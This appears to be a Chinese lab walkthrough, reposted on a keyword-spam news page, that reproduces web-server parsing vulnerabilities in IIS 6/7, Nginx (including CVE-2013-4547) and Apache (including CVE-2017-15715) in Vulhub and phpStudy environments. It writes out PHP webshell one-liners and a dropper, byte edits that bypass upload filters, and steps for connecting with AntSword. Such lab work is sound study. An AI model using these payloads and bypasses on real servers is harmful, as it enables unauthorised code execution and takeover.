当前位置: 首页 > news >正文

网站主页建立 优帮云wordpress自带水印

网站主页建立 优帮云,wordpress自带水印,网页制作素材动漫,小鱼在线网站建设一.IIS解析漏洞复现 1.IIS6.X 方式一:目录解析 搭建IIS环境 在网站下建立文件夹的名字为.asp/.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。 访问成功被解析 方式一:目录解析 在IIS 6处理文件解…

一.IIS解析漏洞复现

1.IIS6.X

方式一:目录解析

搭建IIS环境

在网站下建立文件夹的名字为.asp/.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。

 

访问成功被解析

方式一:目录解析

在IIS 6处理文件解析时,分号可以起到截断的效果。也就是说 shel.asp;.jpg会被服务器看成是shell.asp。另外IIS6.0默认的可执行文件除了asp还包含 asa\cer\cdx

创建一个文件1.asp;.jpg

写入以下内容

访问,成功被解析

2.IIS7.X

在I1S7.0和I1S7.5版本下也存在解析漏洞,在默认Fast-CGI开启状况下,在一个文件路径/xx.jpg后面加上/xx.php会将/xx.jpg/xx.php 解析为 php 文件。

首先安装phpStudyIIS版

再安装对应的Windows服务,启动phpStudy

打开IIS管理器,做如下操作,点击确定

找到php的配置文件将下面内容取消注释,重启phpStudy

在网站的根目录下创建一个1.jpg写入以下内容<?php phpinfo(); ?>,在路径后加上/.php访问,php代码被成功解析

二.Nginx解析漏洞复现

创建环境

安装docker:all docker.io

安装docker-compose:apt install docker-compose

拉取靶场镜像:git clone https://github.com/vulhub/vulhub.git

进入以下Vulhub路径并开启容器

cd /nginx/nginx_parsing_vulnerability

docker-compose build

docker-compose up -d

docker ps -a

1.nginx_parsing

这个解析漏洞其实是PHP CGI的漏洞,在PHP的配置文件中有一个关键的选项cgi.fix_pathinfo默认是开启的,当URL中有不存在的文件,PHP就会向前递归解析。在一个文件/xx.jpg后面加上/.php会将/xx.jpg/xx.php 解析为 php 文件。

上传一个jpg文件写入以下代码GIF89a

<?php phpinfo(); ?>,上传

上传成功

在路径后面加入/.php访问,成功解析到文件里的php代码

2.CVE-2013-4547

上传文件,文件里写入<?php fputs(fopen('xnq.php','w'),'<?php @eval($_POST["cmd"])?>');?>

Bp开启抓包,提交查询

点击Hex,找到刚刚的两个空格,修改第二个20为00,放行

上传成功

在.php和.jpg中间输入两个空格,访问抓包

点击Hex,找到第修改的二个空格修改20为00,放行

访问成功,代码被成功执行

再访问一下我们的写入的木马文件,成功访问,说明写入成功

用中国蚁剑链接,连接成功

三.Apache解析漏洞复现

1.apache_parsing

上传一个后缀名是.php.jpg的文件里面写入<?php phpinfo(); ?>

上传成功

访问上传的文件,php代码被成功解析

2.CVE-2017-15715

上传文件,文件里写入一句话木马<?php @eval($_POST['cmd']); ?>

Bp开启抓包,提交查询

点击Hex,修改20为0a,放行

访问文件名+%0a,访问成功

用中国蚁剑链接,连接成功

http://www.yayakq.cn/news/244558/

相关文章:

  • 词典网站模板考网站开发工程师
  • 外围网站怎么做快速做网站用什么软件
  • 上市企业网站设计做网站用织梦好吗
  • 网站推广策划书模板广州行业门户网站建设
  • 特产网站建设策划书白银做网站的董事
  • 大连金州网站建设弄宽带要多少钱
  • 现今网站开发的主流框架免费建设物流网站
  • 网站优化千牛帮广告设计专业简历
  • vue做网站对seo大学生创新创业大赛英文
  • 如何创建网站难吗阿里云wordpress插件
  • 做良心网站三联网站建设
  • 有哪些学做衣服的网站做网站和APP需要注册公司吗
  • 别人能打开的网站我打不开做电池网站的引导页
  • 网站建设的分工国产做性直播视频网站
  • 网站导入页欣赏卖保健品可以自己做网站卖吗
  • 酒泉网站建设费用网站关键词优化建议
  • 有什么网站可以做试题中国对外贸易网站
  • 解决问题的网站做玻璃钢的企业网站
  • 道滘镇仿做网站WordPress链接加前缀
  • 分析网站的关键词天津网站优化推广方案
  • 明星粉丝网站怎么做的有限公司和有限责任的区别在哪里
  • 网站开发的问题html期末作业网页代码
  • 网站腾讯备案吗科技厅
  • 企业网站建设论坛广告设计公司服务不到位
  • 公司网站cms怎么制作游戏app
  • 建站是什么东西营销型网站手机端
  • 网站设计模块wordpress啦去
  • 凡科网站模块合肥建设集团信息网站
  • 单位做网站怎么做深圳建设一个网站制作公司
  • 陕西网页制作公司织梦网站后台如何做百度优化